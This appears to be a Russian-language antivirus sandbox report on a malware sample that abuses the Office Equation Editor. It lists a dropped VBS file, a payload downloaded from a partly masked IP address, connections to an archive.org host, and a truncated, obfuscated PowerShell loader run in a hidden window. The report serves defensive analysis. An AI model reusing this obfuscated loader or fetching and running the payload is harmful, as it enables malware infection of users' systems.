Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\decenthonezmilkbuttersockhs.vBS"
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\decenthonezmilkbuttersockhs.vbs
Сетевая активность
Подключается к
- '45.##6.253.157':80
- 'ia#####4.us.archive.org':443
TCP
Запросы HTTP GET
- http://45.##6.253.157/NED/decenthonezmilkbuttersockh.tIF
Другие
- 'ia#####4.us.archive.org':443
UDP
- DNS ASK ia#####4.us.archive.org
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⼝ ⚟ ⒞ ⭋ ⨲Bp⼝ ⚟ ⒞ ⭋ ⨲G0⼝ ⚟ ⒞ ⭋ ⨲YQBn⼝ ⚟ ⒞ ⭋ ⨲GU⼝ ⚟ ⒞ ⭋ ⨲VQBy⼝ ⚟ ⒞ ⭋ ⨲Gw⼝ ⚟ ⒞ ⭋ ⨲I⼝ ⚟ ⒞ ⭋ ⨲⼝ ⚟ ⒞ ⭋ ⨲9⼝ ⚟ ⒞ ⭋ ⨲C⼝ ⚟ ⒞ ⭋ ⨲⼝ ⚟ ⒞ ⭋ ⨲JwBo⼝ ⚟ ⒞ ⭋ ⨲HQ⼝ ⚟ ⒞ ⭋ ⨲d⼝ ⚟ ⒞ ⭋ ⨲Bw⼝ ⚟ ⒞ ⭋ ⨲... (со скрытым окном)
